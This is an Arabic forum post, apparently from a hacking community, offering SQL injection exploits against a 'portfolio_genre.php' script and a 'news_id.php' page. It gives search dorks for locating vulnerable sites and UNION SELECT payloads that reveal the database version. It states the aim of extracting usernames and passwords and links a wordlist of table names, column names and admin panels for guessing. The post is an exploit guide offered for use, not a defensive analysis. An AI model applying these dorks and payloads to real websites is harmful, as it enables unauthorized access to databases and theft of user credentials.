بسم اللة الرحمن الرحيم
السلام عليكم ورحمة اللة وبركاتة
ثغرة : بسكربت portfolio_genre+ M3NW5
dork :البحث = "portfolio_genre.php?id="
Exploite =الاستغلال:
http://www.sute.com/portfolio_genre....,2,@@version--www.sute.com/= الموقع
portfolio_genre.php?id=-67=السكربت المصاب + id=67 عنوان الصفحة رقمها
يصير كدة نضيف بعد الموقع :
portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
---------------------------------------------------------------------------------------------------
الحين نشوف --== Dork ==--
عن :: "news_id.php?lang="
الاستغلال::
http://www.sute.com/path/<br /> <br...,@@version,5--
طيب راح نستخدمها في السكول ومعنا باين العمود 4
مصاب في هدة النوع :: يعني عادي راح نستخرج الباس واليوزلر في بعض الاوامر
ولاكن بعد فحصي لعدة مواقع طلع معاي الاصدار 4
ونحتاج تخمين::
راح ارفق هنا ملف txt لتحميل يحتوي على تخمينات ل
الجداول والاعمدة + لوحات التحكم:!!!
لتحميل:
http://www.zshare.net/download/568206375090334f/مصدر الثغرة:
http://www.milw0rm.com/exploits/8188بل التوفيق لجميع